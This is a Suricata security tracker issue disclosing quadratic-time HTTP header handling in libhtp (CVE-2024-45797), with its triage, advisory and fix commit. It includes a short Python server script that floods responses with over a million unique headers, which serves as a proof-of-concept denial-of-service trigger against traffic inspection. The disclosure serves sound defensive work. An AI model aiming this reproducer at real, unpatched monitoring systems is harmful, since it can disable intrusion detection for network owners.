Security #7191: http: quadratic complexity in headers processing/finding - Suricata - Open Information Security Foundation

Actions

Security #7191

closed

PA PA

http: quadratic complexity in headers processing/finding

Security #7191: http: quadratic complexity in headers processing/finding

Added by Philippe Antoine over 1 year ago. Updated over 1 year ago.

Status:

Closed

Priority:

Normal

Assignee:

Philippe Antoine

Target version:

Affected Versions:

Label:

CVE:

Git IDs:

Severity:

CRITICAL

Disclosure Date:

Description

Found while creating CTF challenge against curl CVE-2023-38039

Script to create traffic was

import socket

HOST = "127.0.0.1"  # Standard loopback interface address (localhost)
PORT = 8001  # Port to listen on (non-privileged ports are > 1023)

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.bind((HOST, PORT))
    s.listen()
    conn, addr = s.accept()
    with conn:
        print(f"Connected by {addr}")
        while True:
            data = conn.recv(1024)
            if not data:
                break
            conn.sendall(b"HTTP/1.1 200 OK\n")
            for i in range(1024*1024):
                conn.sendall(b"Name%d: value%d\n" % (i, i))

Most time is spent in htp_process_response_header_generic. doing the htp_table_get

Files

Download all files

curlinf.pcapng (24.1 MB) curlinf.pcapng		Philippe Antoine, 07/31/2024 09:47 AM
curlinf2.pcapng (2.14 MB) curlinf2.pcapng		Philippe Antoine, 07/31/2024 09:50 AM

Subtasks 1 (0 open — 1 closed)

Related issues 1 (0 open — 1 closed)

OT Updated by OISF Ticketbot over 1 year ago Actions
Copy link
#1

Subtask #7192 added

OT Updated by OISF Ticketbot over 1 year ago Actions
Copy link
#2

Label deleted (~~Needs backport to 7.0~~)

PA Updated by Philippe Antoine over 1 year ago Actions
Copy link
#3

File curlinf2.pcapng curlinf2.pcapng added
Label Needs backport to 7.0 added

Smaller reproducer

This was not found by quadfuzz, because there needs to be a massive copy/paste but with each getting a small unique mutation...

OT Updated by OISF Ticketbot over 1 year ago Actions
Copy link
#4

Label deleted (~~Needs backport to 7.0~~)

PA Updated by Philippe Antoine over 1 year ago Actions
Copy link
#5

Status changed from New to Assigned

I guess the simple solution is to add a limit to the number of headers

PA Updated by Philippe Antoine over 1 year ago Actions
Copy link
#6

Status changed from Assigned to In Review

libhtp gitlab MR

VJ Updated by Victor Julien over 1 year ago Actions
Copy link
#7

Related to Task #7246: libhtp 0.5.49 added

VJ Updated by Victor Julien over 1 year ago Actions
Copy link
#8

Severity changed from MODERATE to CRITICAL

CRITICAL is it is a trivial action that the client can initiate.

VJ Updated by Victor Julien over 1 year ago Actions
Copy link
#9

https://github.com/OISF/libhtp/security/advisories/GHSA-rqqp-24ch-248f

JF Updated by Juliana Fajardini Reichow over 1 year ago Actions
Copy link
#10

CVE set to 2024-45797

https://github.com/OISF/libhtp/security/advisories/GHSA-rqqp-24ch-248f

PA Updated by Philippe Antoine over 1 year ago Actions
Copy link
#11

Status changed from In Review to Resolved

https://github.com/OISF/libhtp/commit/0d550de551b91d5e57ba23e2b1e2c6430fad6818

PA Updated by Philippe Antoine over 1 year ago Actions
Copy link
#12

Status changed from Resolved to Closed

VJ Updated by Victor Julien over 1 year ago Actions
Copy link
#13

Private changed from Yes to No

Actions

Also available in: PDF Atom